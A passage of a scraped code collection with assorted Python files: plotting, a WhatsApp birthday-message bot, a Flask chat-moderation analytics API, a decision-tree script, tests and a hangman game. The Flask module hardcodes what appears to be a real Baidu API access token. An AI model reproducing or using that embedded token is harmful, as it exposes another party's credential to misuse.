'lines',\n name = 'Twist') \n ])\n\n layout_five = dict(title = 'Graph of Joint Accelerations vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Accelerations(rad/s2)'),\n )\n \n # sixth chart plots tcp force vs time as a line chart\n graph_six = []\n \n graph_six.append(\n \n go.Scatter(\n x = time,\n y = df['tcp_force_scalar'].tolist(),\n mode = 'lines',\n name = 'force')\n )\n\n layout_six = dict(title = 'Graph of TCP Force vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'TCP Force(N)'),\n )\n \n\n # seventh chart plots percentage of the different'safety mode' occurrences as a bar chart \n graph_seven = []\n \n classes = df['safety_mode'].unique()\n \n safety_mode_list = []\n \n for label in classes:\n safety_mode_list.append(len(df[df['safety_mode']==label]) / len(df) * 100)\n\n graph_seven.append(\n go.Bar(\n x = classes,\n y = safety_mode_list,\n )\n )\n\n layout_seven = dict(title = 'Safety Mode Types Occurrence (%)',\n xaxis = dict(title = 'Safety Mode Type',),\n yaxis = dict(title = 'Occurrence (%)'),\n )\n\n # eigth chart plots occurrence of protective stops vs time \n graph_eight = []\n \n df = pd.get_dummies(df, columns=['safety_mode'])\n \n safety_mode_list = []\n \n\n graph_eight.append(\n \n go.Scatter(\n x = time,\n y = df['safety_mode_protective_stop'].tolist(),\n mode = 'lines',\n name = 'P.S.')\n )\n\n\n layout_eight = dict(title = 'Protective Stop Occurrences',\n xaxis = dict(title = 'Time',),\n yaxis = dict(title = 'Occurrence'),\n )\n\n \n # append all charts to the figures list\n figures = []\n figures.append(dict(data=graph_one[0], layout=layout_one))\n figures.append(dict(data=graph_two[0], layout=layout_two))\n figures.append(dict(data=graph_three[0], layout=layout_three))\n figures.append(dict(data=graph_four[0], layout=layout_four))\n figures.append(dict(data=graph_five[0], layout=layout_five))\n # only 1 scatter plot in graph 6, so no need to index 0\n figures.append(dict(data=graph_six, layout=layout_six))\n # only 1 bar plot\n figures.append(dict(data=graph_seven, layout=layout_seven))\n # only 1 scatter plot\n figures.append(dict(data=graph_eight, layout=layout_eight))\n\n return figures\n","sub_path":"wrangling_scripts/wrangle_data.py","file_name":"wrangle_data.py","file_ext":"py","file_size_in_byte":12084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"265462658","text":"from selenium import webdriver\nimport time\nfrom datetime import datetime\nimport pyautogui\n\n# get current date\nnow = datetime.now()\n\n# set the date and time format\ndate_format = \"%m-%d-%Y %H:%M:%S\"\n\n# convert string to actual date and time\ntime1 = datetime.strptime(now.strftime('%m-%d-%Y %H:%M:%S'), date_format)\ntime2 = datetime.strptime('8-14-2019 00:00:01', date_format)\n\ndiff = time2 - time1\n\nprint(str(diff.seconds))\n\n\nbrowser = webdriver.Chrome('chromedriver')\n\nbrowser.get('https://web.whatsapp.com/')\ntime.sleep(10)\ndo = browser.find_element_by_xpath('//*[@id=\"pane-side\"]/div[1]/div/div/div[1]')\ndo.click()\n\ntime.sleep(diff.seconds)\n\ndo = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]')\ndo.send_keys('Hallo Linus, über die nächste Zeit werden etliche Nachrichten von einem selbstgeschriebenem Programm geschickt. Ich wünsche dir einen ...')\npyautogui.press('enter')\n\n# Declare array holding tons of translations of \"happy birthday\"\n\nhappy_birthday = [\"wunderbaren Geburtstag!\", \"happy birthday! - Englisch\", \"հիանալի ծննդյան օր! - Armenisch\", \"un magnifique anniversaire! - Französisch\", \"in prachtige jierdei! - Friesisch\", \"ένα θαυμάσιο γενέθλιο! - Griechisch\", \"lā hānau maikaʻi! - Hawaiianisch\", \"멋진 생일 - Koreanisch\", \"un maravilloso cumpleaños! - Spanisch\", \"wspaniałe urodziny! - Polnisch\", \"прекрасный день рождения! - Russisch\"]\n\nfor xhappy in happy_birthday:\n find_path = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]')\n find_path.send_keys(xhappy)\n pyautogui.press('enter')\n time.sleep(600)\n\n#time.sleep(3)\n#browser.quit()\n","sub_path":"LinusGeburtstagsgeschenk.py","file_name":"LinusGeburtstagsgeschenk.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"346503199","text":"import re\n\nfrom flask import Blueprint, jsonify, request\nfrom sqlalchemy import and_\n\nfrom IMMonitor import app, ret_val\nfrom IMMonitor.db.common import db\nfrom IMMonitor.analysis.model import MsgDetectResult\nfrom IMMonitor.analysis import msg_detect\nfrom IMMonitor.analysis.model import MsgDetectResult\nfrom IMMonitor.wx.model import WxGroupMessage\n\n\nACCESS_TOKEN = '24.5066b60e5aa6af8577c4aadaec727cd8.2592000.1546587768.282335-15056684'\nDETECT_URL_IMG = 'https://aip.baidubce.com/rest/2.0/solution/v1/img_censor/user_defined'\nDETECT_URL_TEXT = 'https://aip.baidubce.com/rest/2.0/antispam/v2/spam'\n\nbp_analysis = Blueprint('bp_analysis', __name__)\n\n\n# @app.route('/analysis/text_dectect')\n# def text_dectect():\n# text = '明天去天安门闹事'\n# detect_result = msg_detect.detect_text(text)\n# detect_result = msg_detect.unify_detect_result(msg_type='Text', msg_id='123456', result=detect_result)\n# MsgDetectResult.batch_insert(detect_result)\n#\n# return jsonify({\n# 'ok': 'ok'\n# })\n\n\n# 2.识别每个群违规信息关键词,绘制词云图\n@app.route('/analysis/msg_keywords')\ndef msg_keywords():\n \"\"\"\n 识别并统计每个群违规信息关键词\n :return:\n \"\"\"\n args = request.args\n label = args.get('label')\n group_id = args.get('group_id')\n\n if not all([label, group_id]):\n return jsonify(ret_val.gen(ret_val.CODE_PARAMS_ERR, extra_msg='需要传入label和group_id参数'))\n # 数据库交互,取出每条违规消息敏感词列表\n keywords = db.session.query(MsgDetectResult.result_info, WxGroupMessage)\\\n .filter(and_(WxGroupMessage.group_id == group_id, MsgDetectResult.msg_id == WxGroupMessage.MsgId)).all()\n keywords_list = []\n for keyword in keywords:\n keywords_list += keyword[0].split(',')\n keywords_dict = {}\n # 桶排序统计每条违规消息敏感词频数\n for key_word in keywords_list:\n if not keywords_dict.get(key_word):\n keywords_dict[key_word] = 1\n else:\n keywords_dict[key_word] = keywords_dict[key_word] + 1\n\n return jsonify(ret_val.gen(ret_val.CODE_SUCCESS, data=keywords_dict))\n\n\n# 3.每个群成员发送违规消息量统计\n@app.route('/analysis/member_danger')\ndef member_danger():\n \"\"\"\n 统计指定群成员发送违规消息量\n :return:\n \"\"\"\n args = request.args\n label = args.get('label')\n group_id = args.get('group_id')\n\n if not all([label, group_id]):\n return jsonify(ret_val.gen(ret_val.CODE_PARAMS_ERR, extra_msg='需要传入label和group_id参数'))\n # 数据库交互,取出发出每条违规消息的成员名列表\n danger_list = db.session.query(MsgDetectResult, WxGroupMessage.FromUserNickName)\\\n .filter(and_(WxGroupMessage.group_id == group_id, MsgDetectResult.msg_id == WxGroupMessage.MsgId)).all()\n member_list = {}\n # 桶排序实现群成员违规消息统计\n for danger in danger_list:\n UserNickName = danger[1]\n if not member_list.get(UserNickName):\n member_list[UserNickName] = 1\n else:\n member_list[UserNickName] = member_list[UserNickName] + 1\n\n return jsonify(ret_val.gen(ret_val.CODE_SUCCESS, data=member_list))\n\n\n# 4. 统计单个群消息总数,每种违规消息(比如暴恐,色情,政治敏感等)数量\n@app.route('/analysis/group_danger')\ndef group_danger():\n args = request.args\n label = args.get('label')\n group_id = args.get('group_id')\n if not all([label, group_id]):\n return jsonify(ret_val.gen(ret_val.CODE_PARAMS_ERR, extra_msg='需要传入label和group_id参数'))\n\n danger_list = db.session.query(WxGroupMessage, MsgDetectResult)\\\n .filter(and_(WxGroupMessage.group_id == group_id,\n WxGroupMessage.MsgId == MsgDetectResult.msg_id)).all()\n\n label_dict = {'1': 0, '2': 0, '3': 0, '4': 0, '8': 0, '21': 0, '22': 0, '23': 0, '24': 0, '25': 0}\n # img_type = {'1': '色情', '2': '性感', '3': '暴恐', '4': '恶心', '8': '政治人物'}\n # text_label = {'21': '暴恐违禁', '22': '文本色情', '23': '政治敏感', '24': '恶意推广', '25': '低俗辱骂'}\n # 违禁信息类别融合\n # '色情性感': # 1 + 2 + 22\n # '暴恐违禁': # 3 + 21\n # '政治敏感': # 8 + 23\n # '低俗辱骂': # 25\n # '恶心反感': # 4 +24\n group_danger_dict = {'色情性感': 0, '暴恐违禁': 0, '政治敏感': 0, '低俗辱骂': 0, '恶心反感': 0}\n for danger in danger_list:\n label_dict[str(danger[1].result_label)] += 1\n group_danger_dict['色情性感'] = label_dict['1'] + label_dict['2'] + label_dict['22']\n group_danger_dict['暴恐违禁'] = label_dict['3'] + label_dict['21']\n group_danger_dict['政治敏感'] = label_dict['8'] + label_dict['23']\n group_danger_dict['低俗辱骂'] = label_dict['25']\n group_danger_dict['恶心反感'] = label_dict['4'] + label_dict['24']\n\n return jsonify(ret_val.gen(ret_val.CODE_SUCCESS, data=group_danger_dict))\n\n\n# 5.单个群每天各时段违规消息占比变化趋势图\n@app.route('/analysis/datetime_danger')\ndef datetime_danger():\n \"\"\"\n 单个群每天各时段违规消息数量\n :return: 每天违规消息数量和每天中各小时的违规消息数量\n \"\"\"\n args = request.args\n label = args.get('label')\n group_id = args.get('group_id')\n\n if not all([label, group_id]):\n return jsonify(ret_val.gen(ret_val.CODE_PARAMS_ERR, extra_msg='需要传入label和group_id参数'))\n\n # 数据库交互,取出发出每条违规消息的成员名列表\n date_time_list = db.session.query(MsgDetectResult, WxGroupMessage.date_created)\\\n .filter(and_(WxGroupMessage.group_id == group_id, MsgDetectResult.msg_id == WxGroupMessage.MsgId)).all()\n\n danger_dict = {\"day\": 0, \"hour\": 0}\n danger_day_dict = {}\n danger_hour_dict = {}\n # 桶排序实现群成员违规消息统计\n for time in date_time_list:\n # time[1]: 2019-03-09 11:14:47.574616\n # 统计每一天的违规消息数量\n date_temp = re.search(r\"(\\d{4}-\\d{1,2}-\\d{1,2})\", str(time[1]))\n day = date_temp.group(0)\n if not danger_day_dict.get(day):\n danger_day_dict[day] = 1\n else:\n danger_day_dict[day] += 1\n # 统计每天中各小时的违规消息数量\n hour_temp = re.search(r\"(\\d{1,2}:\\d{1,2})\", str(time[1]))\n hour = hour_temp.group(1).split(\":\")[0]\n if not danger_hour_dict.get(hour):\n danger_hour_dict[hour] = 1\n else:\n danger_hour_dict[hour] += 1\n\n danger_dict['day'] = danger_day_dict\n danger_dict['hour'] = danger_hour_dict\n return jsonify(ret_val.gen(ret_val.CODE_SUCCESS, data=danger_dict))\n\n","sub_path":"IMMonitor/analysis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"554321896","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 5 11:02:03 2016\n\n@author: zp4wo\n\"\"\"\n##using code in py27\n\n\n'''\nimport pandas as pd\nimport numpy as np\n\n\n#loading data\n\ntxn_data = pd.read_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//database//csv_Files//processed data//trx//CH_RC_spending_Y12toY15_0504_updated.csv')\ndays_labels = pd.read_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0504//days_labels.csv')\nseason_labels = pd.read_excel('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0503//df_all_labels.xlsx', encoding='utf-8')\n\n#keep S1415 data\ntxn_data_S1415 = txn_data[txn_data.FY == 'S1415']\n\n# days labels\ndays_labels_keep = days_labels[['KeyID','card_holder_no','Date', 'Days_labels']]\n\n# season and segment labels\nseason_labels_keep = season_labels[['KeyID','card_holder_no','labels', 'comb_labels']]\ndf_merge1 = pd.merge(txn_data_S1415, days_labels_keep, on=['KeyID','card_holder_no','Date'], how='left')\ndf_merge2 = pd.merge(df_merge1, season_labels_keep, on=['KeyID','card_holder_no'], how='left')\n\n# only keeping the base txn\n# also excluding banquet, since we don't use banquet to generate days lables and recreation labels\n\nind_base = df_merge2['labels'].notnull()\nind_banquet = df_merge2.Category_type == 'Banquet'\ndf_txn = df_merge2[ind_base & ~ind_banquet]\n\n#%%\n#adding prework ect labels\n\n#==============================================================================\n# Day night time\n#==============================================================================\nimport copy\n\ndf_txn.start_datetime = pd.to_datetime(df_txn.start_datetime)\ndf_come_time = copy.deepcopy(df_txn)\n\ncome_time = df_come_time.groupby(['KeyID', 'card_holder_no', 'Date']).min()['start_datetime'].dropna()\ndf_come_time = come_time.to_frame()\n#df_come_time.to_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0505//df_come_time.csv')\n#%%\nind_early_then_9 = (df_come_time.start_datetime.apply(lambda x: x.hour) < 9)\nind_12to14 = (df_come_time.start_datetime.apply(lambda x: x.hour) > 12) & (df_come_time.start_datetime.apply(lambda x: x.hour) <14)\nind_9to12 = (df_come_time.start_datetime.apply(lambda x: x.hour) >= 9) & (df_come_time.start_datetime.apply(lambda x: x.hour) <= 12)\nind_14to17 = (df_come_time.start_datetime.apply(lambda x: x.hour) >= 14) & (df_come_time.start_datetime.apply(lambda x: x.hour) <= 17)\nind_after_17 = (df_come_time.start_datetime.apply(lambda x: x.hour) > 17)\n\n#%%\n#@todo\n#adding labels here\ndf_come_time.loc[ind_early_then_9, 'come_time_labels'] = 'pre_work'\ndf_come_time.loc[ind_12to14, 'come_time_labels'] = 'lunch_time'\ndf_come_time.loc[ind_9to12 | ind_14to17, 'come_time_labels'] = 'work_hour'\ndf_come_time.loc[ind_after_17, 'come_time_labels'] = 'after_work'\n\n#%%\ndf_come_time_ = df_come_time.drop('start_datetime', axis=1).reset_index()\ndf_txn_ = pd.merge(df_txn, df_come_time_, on=['KeyID','card_holder_no','Date'], how='left')\ndf_txn_.to_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//df_txn_.csv', index=0)\n'''\n\n#%%\nimport pandas as pd\nimport numpy as np\ndf_txn_ = pd.read_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//df_txn_.csv')\n\n#%%\n#running models of DT\n#date prepare\n# only for core HV/racegoing\nlist_ = ['Category_type','day_of_week','location', 'comb_labels', 'labels', 'come_time_labels']\ndataset = df_txn_[list_]\ndataset['come_time_labels'].fillna('unknown', inplace=1)\ndataset_HV = dataset[dataset['labels'] == '2. core HV']\ndataset_RG = dataset[dataset['labels'] == '3A. Racegoing']\n\ndataset_HV.drop('labels', inplace=1, axis=1)\ndataset_RG.drop('labels', inplace=1, axis=1)\n\ndataset_HV.dropna(subset=['Category_type', 'comb_labels'], inplace=1)\ndataset_RG.dropna(subset=['Category_type', 'comb_labels'], inplace=1)\n\n#%%\n#core HV dataset\ndef model(dataset):\n\timport copy\n\tdata = copy.deepcopy(dataset)\n\t\n\tfrom sklearn import tree\n\tfrom sklearn import preprocessing\n\t\n\tdata_X = data[['Category_type', 'day_of_week', 'location', 'come_time_labels']]\n\tdata_y = data[['comb_labels']]\n\t\n\tle1 = preprocessing.LabelEncoder()\n\tle2 = preprocessing.LabelEncoder()\n\tle3 = preprocessing.LabelEncoder()\n\tle4 = preprocessing.LabelEncoder()\n\tle5 = preprocessing.LabelEncoder()\n\t\n\t\n\tle1.fit(data_X['Category_type'])\n\tle2.fit(data_X['day_of_week'])\n\tle3.fit(data_X['location'])\n\tle4.fit(data_X['come_time_labels'])\n\tle5.fit(data_y['comb_labels'])\n\n\t\n\tdata_X.loc[:, 'Category_type'] = le1.transform(data_X['Category_type'])\n\tdata_X.loc[:, 'day_of_week'] = le2.transform(data_X['day_of_week'])\n\tdata_X.loc[:, 'location'] = le3.transform(data_X['location'])\n\tdata_X.loc[:, 'come_time_labels'] = le4.transform(data_X['come_time_labels'])\n\t\n\tdata_y.loc[:, 'comb_labels'] = le5.transform(data_y['comb_labels'])\n\t\n\tclf = tree.DecisionTreeClassifier(\n\t\t\tmax_leaf_nodes=10,\n\t\t\t)\n\tclf_ = clf.fit(data_X, data_y)\n\tclass1 = le1.classes_\n\tclass2 = le2.classes_\n\tclass3 = le3.classes_\n\tclass4 = le4.classes_\n\tclass5 = le5.classes_\n\n\treturn clf_, class1, class2, class3, class4, class5\n\nclf_HV_op = model(dataset_HV)\nclf_RG_op = model(dataset_RG)\n\nclf_HV = clf_HV_op[0]\nclf_RG = clf_RG_op[0]\n\n\n#%%\n\nfeature_names = ['Category_type', 'day_of_week', 'location', 'come_time_labels']\nclass_name = ['1.FB_only', '2.FB_paid', '3.FB_free', '4.FB_free_paid',\n '5.Free_paid', '6.Free_only', '7.Paid_only']\n\ndef output_pdf(clf_, name):\n#\tfrom IPython.display import Image\n\tfrom sklearn import tree\n\tfrom sklearn.externals.six import StringIO\n\timport pydot_ng as pydot\n\tdot_data = StringIO()\n\ttree.export_graphviz(clf_, out_file=dot_data, \n\t feature_names=feature_names, \n\t class_names=class_name, \n\t filled=True, rounded=True, \n\t special_characters=True,\n\t\t\t\t\t node_ids=1,\n\t\t\t\t\t proportion=1) \n\tgraph = pydot.graph_from_dot_data(dot_data.getvalue()) \n\t\n\tgraph.write_pdf(\"C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//%s.pdf\"%name)\n\noutput_pdf(clf_HV, name='HV_tree')\noutput_pdf(clf_RG, name='RG_tree')\n\n#%%\n#Returns the index of the leaf that each sample is predicted as.\n\ndef data_prepare(dataset):\n\timport copy\n\tfrom sklearn import preprocessing\n\t\n\tdata = copy.deepcopy(dataset)\n\t\n\tdata_X = data[['Category_type', 'day_of_week', 'location', 'come_time_labels']]\n\tdata_y = data[['comb_labels']]\n\t\n\tle1 = preprocessing.LabelEncoder()\n\tle2 = preprocessing.LabelEncoder()\n\tle3 = preprocessing.LabelEncoder()\n\tle4 = preprocessing.LabelEncoder()\n\tle5 = preprocessing.LabelEncoder()\n\t\n\t\n\tle1.fit(data_X['Category_type'])\n\tle2.fit(data_X['day_of_week'])\n\tle3.fit(data_X['location'])\n\tle4.fit(data_X['come_time_labels'])\n\tle5.fit(data_y['comb_labels'])\n\t\n\tdata_X.loc[:, 'Category_type'] = le1.transform(data_X['Category_type'])\n\tdata_X.loc[:, 'day_of_week'] = le2.transform(data_X['day_of_week'])\n\tdata_X.loc[:, 'location'] = le3.transform(data_X['location'])\n\tdata_X.loc[:, 'come_time_labels'] = le4.transform(data_X['come_time_labels'])\n\t\n\tdata_y.loc[:, 'comb_labels'] = le5.transform(data_y['comb_labels'])\n\treturn data_X, data_y\n\nHV_X, HV_y = data_prepare(dataset_HV)\nRG_X, RG_y = data_prepare(dataset_RG)\n\nindex_leaf_1 = clf_HV.apply(HV_X)\nindex_leaf_2 = clf_RG.apply(RG_X)\n\ndataset_HV.loc[:, 'node_labels'] = index_leaf_1\ndataset_RG.loc[:, 'node_labels'] = index_leaf_2\n\n#%%\ndataset_HV.to_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//dataset_HV.csv', index=0,encoding='utf-8')\ndataset_RG.to_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//dataset_RG.csv', index=0,encoding='utf-8')\n\n\n\n\n\n\n\n\n\n\n","sub_path":"py27/DT_py27_0505.py","file_name":"DT_py27_0505.py","file_ext":"py","file_size_in_byte":7628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"563537261","text":"from .timeseries import NotEnoughDataException\n\n\nclass MovingAverage:\n def __init__(self, series, timespan):\n self.series = series\n self.timespan = timespan\n\n def value_on(self, end_date):\n moving_average_range = self.series.get_closing_price_list(end_date, self.timespan)\n if len(moving_average_range) < self.timespan:\n raise NotEnoughDataException(\"Not enough data\")\n price_list = [item.value for item in moving_average_range]\n return sum(price_list) / len(price_list)\n","sub_path":"src/stock_alerter/movingaverage.py","file_name":"movingaverage.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"509154068","text":"import os\nimport time\nfrom multiprocessing import Process\n\n\ndef play_music():\n print(\"子进程p1:\", os.getpid())\n for i in range(5):\n print('play music ...')\n time.sleep(1)\n\n\ndef play_lol():\n print(\"子进程p2:\", os.getpid())\n for i in range(5):\n print('play lol ...')\n time.sleep(1)\n\n\nif __name__ == '__main__':\n print('主进程:', os.getpid())\n start_time = time.time()\n p1 = Process(target=play_music)\n p2 = Process(target=play_lol)\n # p1.daemon = True # 默认值是False,当为True的时候,主进程结束,会强制结束子进程\n # p2.daemon = True\n p1.start() # 操作系统 启动一个进程 用来运行target=play_music 的 进程,子进程 (不是完整的代码)\n # p1.join() # 上面的代码任务没有执行完,不会运行下面的代码\n p2.start()\n print(help(p2))\n # p1.join()\n # p2.join()\n\n # p1 p2 都结束后再 计算时间\n # while True:\n # if p1.is_alive() or p2.is_alive():\n # time.sleep(1)\n # else:\n # break\n end_time = time.time()\n print(end_time - start_time)\n\n # 怎么才能保证让主进程最后再结束呢? 用join\n # 主进程: 进程基础.py (代码) python.exe 进程基础.py 运行的时候, 操作系统会 分一个进程, 这个进程我们称为主进程\n # p1.daemon\n # is_alive()","sub_path":"py_08day/进程基础.py","file_name":"进程基础.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"352571413","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n * Created by kevin on 10/30/16.\r\n\"\"\"\r\nfrom django.conf.urls import url\r\n\r\nfrom . import views\r\n\r\napp_name = 'front'\r\n\r\nurlpatterns = [\r\n url(r'^$', views.index_view, name='index'),\r\n url(r'^contact$', views.contact_view, name='contact'),\r\n url(r'^search/$', views.search_view, name='search'),\r\n url(r'^download$', views.download, name='download'),\r\n url(r'^links', views.links, name='links'),\r\n url(r'^search_page$', views.search, name='search_page'),\r\n]\r\n","sub_path":"IncMiGe_new/front/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"247984028","text":"import datetime\n\nimport pytest\nfrom freezegun import freeze_time\n\nfrom its_on.models import switches\n\n\nasync def test_switches_list_without_auhtorize(setup_tables_and_data, client):\n response = await client.get('/zbs/switches')\n\n assert response.status == 401\n\n\nasync def test_update_switch_without_login(setup_tables_and_data, client):\n response = await client.post('/zbs/switches/1', data={'version': 'some_shit'})\n\n assert response.status == 401\n\n\n@pytest.mark.parametrize('switch_title, expected_result', [\n ('switch1', True),\n ('switch2', True),\n ('switch1488', False),\n])\nasync def test_switches_list(setup_tables_and_data, client, login, switch_title, expected_result):\n response = await client.get('/zbs/switches')\n\n content = await response.content.read()\n\n assert (switch_title in content.decode('utf-8')) is expected_result\n\n\nasync def test_switch_detail(setup_tables_and_data, client, login, switch):\n response = await client.get('/zbs/switches/1')\n\n content = await response.content.read()\n\n assert switch.name in content.decode('utf-8')\n\n\n@freeze_time(datetime.datetime(2020, 4, 15, tzinfo=datetime.timezone.utc))\nasync def test_switch_add(setup_tables_and_data, client, login, switch):\n response = await client.get('/zbs/switches/add')\n content = await response.content.read()\n\n assert 'Flag adding' in content.decode('utf-8')\n\n switch_data = {\n 'name': 'switch_to_check_add',\n 'is_active': True,\n 'groups': 'check_adding, group2, ,,',\n 'version': 1,\n 'comment': 'This is the story of a big bad wolf an little girl whose name was Little Red Riding Hood',\n }\n response = await client.post('/zbs/switches/add', data=switch_data)\n content = await response.content.read()\n\n assert 'Switches list' in content.decode('utf-8')\n\n switch_data['is_hidden'] = False\n\n async with client.server.app['db'].acquire() as conn:\n result = await conn.execute(switches.select().where(switches.c.name == switch_data['name']))\n created_switch = await result.first()\n\n for field_name, field_value in switch_data.items():\n if field_name == 'groups':\n field_value = list(\n filter(None, [item.strip() for item in field_value.split(',')]),\n )\n assert getattr(created_switch, field_name) == field_value\n\n assert created_switch.created_at == datetime.datetime(2020, 4, 15, tzinfo=datetime.timezone.utc)\n\n\nasync def test_switch_update(setup_tables_and_data, client, login, switch):\n with freeze_time('2020-08-15'):\n await client.post('/zbs/switches/1', data={'is_active': False})\n\n async with client.server.app['db'].acquire() as conn:\n result = await conn.execute(switches.select().where(switches.c.id == 1))\n updated_switch = await result.first()\n\n assert updated_switch.is_active is False\n assert updated_switch.created_at == datetime.datetime(2020, 4, 15, tzinfo=datetime.timezone.utc)\n assert updated_switch.updated_at == datetime.datetime(2020, 8, 15, tzinfo=datetime.timezone.utc)\n\n\nasync def test_switch_soft_delete(setup_tables_and_data, client, login, switch):\n response = await client.get('/zbs/switches')\n content = await response.content.read()\n\n assert 'switch7' in content.decode('utf-8')\n\n await client.get('/zbs/switches/7/delete')\n\n response = await client.get('/zbs/switches')\n content = await response.content.read()\n\n assert 'switch7' not in content.decode('utf-8')\n\n\nasync def test_resurrect_switch(setup_tables_and_data, client, login, switch):\n response = await client.get('/zbs/switches')\n content = await response.content.read()\n\n assert 'switch3' in content.decode('utf-8')\n\n await client.get('/zbs/switches/3/delete')\n\n response = await client.get('/zbs/switches')\n content = await response.content.read()\n\n assert 'switch3' not in content.decode('utf-8')\n\n switch_data = {\n 'name': 'switch3',\n 'is_active': False,\n 'is_hidden': False,\n 'groups': 'group1',\n 'version': 4,\n }\n response = await client.post('/zbs/switches/add', data=switch_data)\n content = await response.content.read()\n\n assert 'switch3' in content.decode('utf-8')\n\n\nasync def test_switches_copy_without_auhtorize(setup_tables_and_data, client):\n response = await client.post('/zbs/switches/copy')\n\n assert response.status == 401\n\n\n@pytest.mark.parametrize(\n ('http_get_arguments', 'old_switch_is_active_expected', 'expected_updated_at'), [\n ('', True, datetime.datetime(2020, 4, 15, tzinfo=datetime.timezone.utc)),\n ('?update_existing=true', False, datetime.datetime(2020, 10, 15, tzinfo=datetime.timezone.utc)),\n ],\n)\n@freeze_time(datetime.datetime(2020, 10, 15, tzinfo=datetime.timezone.utc))\n@pytest.mark.usefixtures('setup_tables_and_data', 'get_switches_data_mocked_existing_switch')\nasync def test_switches_copy_existing_switch_foo(\n client, login,\n http_get_arguments, old_switch_is_active_expected, expected_updated_at,\n):\n response = await client.post(f'/zbs/switches/copy{http_get_arguments}')\n async with client.server.app['db'].acquire() as conn:\n result = await conn.execute(switches.count())\n switches_count = await result.first()\n switches_count = switches_count[0]\n\n result = await conn.execute(switches.select().where(switches.c.name == 'switch7'))\n old_switch = await result.first()\n\n assert response.status == 200\n assert switches_count == 7\n assert old_switch.is_active == old_switch_is_active_expected\n assert old_switch.updated_at == expected_updated_at\n\n\n@pytest.mark.usefixtures('setup_tables_and_data', 'get_switches_data_mocked_new_switch')\nasync def test_switches_copy_new_switch(client, login):\n response = await client.post('/zbs/switches/copy')\n async with client.server.app['db'].acquire() as conn:\n result = await conn.execute(\n switches.select().where(switches.c.name == 'extremely_new_switch'))\n new_switch = await result.first()\n\n assert response.status == 200\n assert new_switch is not None\n assert new_switch.name == 'extremely_new_switch'\n","sub_path":"tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"259143619","text":"from mock import Mock\nimport unittest\nimport uuid\n\nfrom beeline.trace import _should_sample, SynchronousTracer\n\nclass TestTraceSampling(unittest.TestCase):\n def test_deterministic(self):\n ''' test a specific id that should always work with the given sample rate '''\n trace_id = '8bd68312-a3ce-4bf8-a2df-896cef4289e5'\n n = 0\n while n < 1000:\n self.assertTrue(_should_sample(trace_id, 1000))\n n += 1\n\n def test_probability(self):\n ''' test that _should_sample approximates 1 in N sampling for random IDs '''\n tests_count = 50000\n error_margin = 0.05\n\n sample_rates = [1, 2, 10]\n\n for rate in sample_rates:\n sampled = n = 0\n\n while n < tests_count:\n n += 1\n if _should_sample(str(uuid.uuid4()), rate):\n sampled += 1\n\n expected = tests_count // rate\n\n acceptable_lower_bound = int(expected - (expected * error_margin))\n acceptable_upper_bound = int(expected + (expected * error_margin))\n\n self.assertLessEqual(sampled, acceptable_upper_bound)\n self.assertGreaterEqual(sampled, acceptable_lower_bound)\n\nclass TestSynchronousTracer(unittest.TestCase):\n def test_trace_context_manager_exception(self):\n ''' ensure that send_traced_event is called even if an exception is\n raised inside the context manager '''\n m_client, m_state = Mock(), Mock()\n tracer = SynchronousTracer(m_client, m_state)\n try:\n with tracer('foo'):\n raise Exception('boom!')\n except Exception:\n pass\n \n m_state.pop_event.assert_called_once_with()","sub_path":"beeline/test_trace.py","file_name":"test_trace.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"171461358","text":"import random\nimport os\n\nHANGMAN = (\n\"\"\"\n\"\"\",\n\"\"\"\n \n----------\n\"\"\",\n\"\"\"\n| \n|\n|\n|\n|\n|\n|\n|\n----------\n\"\"\",\n\"\"\"\n| \n|\n|\n|\n|\n|\n|\\\\\n| \\\\\n----------\n\"\"\",\n\"\"\"\n--------\n| \n|\n|\n|\n|\n|\n|\\\\\n| \\\\\n----------\n\"\"\",\n\"\"\"\n--------\n| |\n| \n|\n|\n|\n|\n|\\\\\n| \\\\\n----------\n\"\"\",\n\"\"\"\n--------\n| |\n| 0\n| /X\\\\\n| / \\\\\n|\n|\n|\\\\\n| \\\\\n----------\n\"\"\"\n)\nmax_wrong = len(HANGMAN) - 1\nwords = {\"УРОКИ\":\"Что можно приготовить, но нельзя съесть?\",\n \"ШАХМАТИСТ\":\"Кто ходит сидя?\",\n \"ДВЕРЬ\":\"Кто приходит, кто уходит, все ее за ручку водят.\",\n 